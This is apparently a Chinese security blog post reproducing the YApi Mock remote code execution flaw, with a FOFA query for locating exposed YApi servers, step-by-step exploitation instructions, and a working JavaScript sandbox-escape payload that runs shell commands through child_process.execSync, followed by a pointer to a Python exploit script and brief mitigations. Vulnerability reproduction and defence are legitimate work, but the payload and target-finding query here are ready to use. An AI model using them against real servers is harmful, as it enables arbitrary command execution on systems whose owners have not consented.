首页 漏洞复现

YApi Mock 远程代码执行漏洞复现

发布时间:2021年07月09日 评论数：抢沙发 阅读数：2219

本文参考 github 安全鸭 

github的漏洞详情

https://github.com/YMFE/yapi/issues/2233#

近日，网络上爆出 YApi 的远程代码执行 0day 漏洞 正被广泛利用。攻击者通过注册用户后，即可通过 Mock 功能远程执行任意代码。


漏洞描述：
  YAPI接口管理平台是国内某旅行网站的大前端技术中心开源项目，使用mock数据/脚本作为中间交互层，为前端后台开发与测试人员提供更优雅的接口管理服务，该系统被国内较多知名互联网企业所采用。YApi是高校、易用、功能强大的api管理平台。但因为大量用户使用YAPI的默认配置并允许从外部网络访问YAPI服务，导致攻击者注册用户后，即可通过Mock功能远程执行任意代码。

     fofa语法

app="YApi"

漏洞复现过程：

这是主页~~~~~~~





首先注册一个用户



接着新建一个项目



接着返回项目首页新建一个接口~~~~~~~~









写入exp！！！！！


   exp:

const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("whoami").toString()




保存后直接访问接口












详情参考github地址 

                 https://github.com/YMFE/yapi/issues/2233#

                 一个不愿意透露姓名的好心人提供好了 python3脚本

                使用方法 python3 exp.py -u url -e whomi

                脚本稍微有点问题 凑合用吧

修复建议

     该漏洞暂无补丁。

临时修复建议

1.关闭YAPi用户注册功能，以阻断攻击者注册。

2.利用请求白名单的方式限制YAPi相关端口。

3.排查YAPi服务器是否存在恶意访问记录。

切勿非法用途，履行白帽职责。